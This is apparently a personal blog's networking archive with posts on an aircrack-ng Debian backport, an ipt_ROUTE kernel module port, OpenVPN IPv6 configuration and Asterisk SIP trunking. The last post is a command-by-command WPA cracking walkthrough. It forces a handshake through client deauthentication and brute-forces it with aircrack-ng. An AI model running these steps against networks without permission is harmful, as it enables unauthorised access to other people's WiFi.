Category Archives: Networking

Backport of Aircrack-ng for Debian Wheezy

I have created a backport of aircrack-ng based on the version in Jessie/Testing. This may be installed with the command:
dpkg -i aircrack-ng_1.1-6~bpo70+1_amd64.deb
(remove the package with command: dpkg -r aircrack-ng)
download here

This package is now available in Debian wheezy-backports.

Back in March 2012 I built the latest svn version from source, available here.
I have included the necessary scripts and binary files in the ‘bin/’ directory. Copy these to somewhere like: /usr/local/sbin/

ipt_ROUTE Netfilter module ported to Linux 2.6.31

The ipt_ROUTE module became depreciated in an earlier version of Linux 2.6 – however I needed it so ported it to Linux Kernel version 2.6.31.

Disclaimer: wherever possible iproute2 should be used to achieve the desired effect.

The sources include the Kernel module and extensions to iptables.

This module and iptables extension create a new target which may be used on the mangle table.
Target usage: -j ROUTE <option>
options:
--oif ifname - Route packet through `ifname' network interface
--iif ifname - Change packet's incoming interface to `ifname'
--gw ip - Route packet via this gateway `ip'
--continue - Route packet and continue traversing the rules. (Not valid with --iif or --tee)
--tee - Duplicate packet and route the duplicate, continue traversing the original packet. (Not valid with --iif or --continue)

I have tested the ported module on the PREROUTING and INPUT chains of the mangle table.

I use this module to route packets that have a destination IP address which matches a local IP address, out of an ethernet interface (using --oif option). These packets would normally be directed to the local system.

OpenVPN – IPv6 with tun device

Note: IPv6 is not supported using OpenVPN on Debian Squeeze (stable). The version used by Debian Wheezy (testing) supports IPv6.

Network setup:
- 192.168.1.0/24 - Local IPv4 network
- 2001:412:abcd::/48 - Local IPv6 network
- 192.168.2.0/24 - Tunnel IPv4 network
- 2001:412:abcd:2::/64 - Tunnel IPv6 network

I have included only the sections of config files which need ammending to enable IPv6 over OpenVPN.

Client Config
# Use the same setting as you are using on
# the server.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun
# enable ipv6
tun-ipv6

Server Config
# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun0
# Enable TUN IPv6 module
tun-ipv6

# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 192.168.2.0 255.255.255.0
server-ipv6 2001:412:abcd:2::/64

# Push routes to the client to allow it
# to reach other private subnets behind
# the server. Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
push "route 192.168.1.0 255.255.255.0"
push "route-ipv6 2001:412:abcd::/48

# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
;push "redirect-gateway def1 bypass-dhcp"

# Enable to make openvpn the default route for ipv6 connectivity?
;push "route-ipv6 2000::/3"

SIP Trunking between Asterisk 1.4 and Cisco CUBE

As far as I can tell Cisco CUBE only supports unauthenticated SIP trunks, which isn’t too much trouble for Asterisk.

In sip.conf:
type=peer
host=x.x.x.x
context=trunks-inbound
allow=all
insecure=invite,port
trustrpid=yes
sendrpid=no
qualify=yes
(change ‘trunks-inbound’ to the necessary context)

In extensions.conf:
exten=>_0.,1,Set(CALLERID(num)=nnn-nnn-${CALLERID(num)})
exten=>_0.,n,Dial(SIP/x.x.x.x/${EXTEN:1})
exten=>_0.,n,Hangup
(First line is optional, and simply adds a prefix to the outgoing caller ID)

The “insecure=invite,port” is the critical part, as the source port from the Cisco CUBE appears to be dynamic unlike a tradition SIP trunk.

Brute Forcing WPA WiFi Encryption

WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Enter monitor mode: airmon-ng start wlan0
  3. Find nearby networks: airodump-ng mon0
  4. Identify the target BSSID and Channel number (-c option below)
  5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
  6. Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
  7. Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
  8. Apply brute force: aircrack-ng -w password.lst capturefile.cap
  9. The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
  10. Stop monitor mode: airmon-ng stop mon0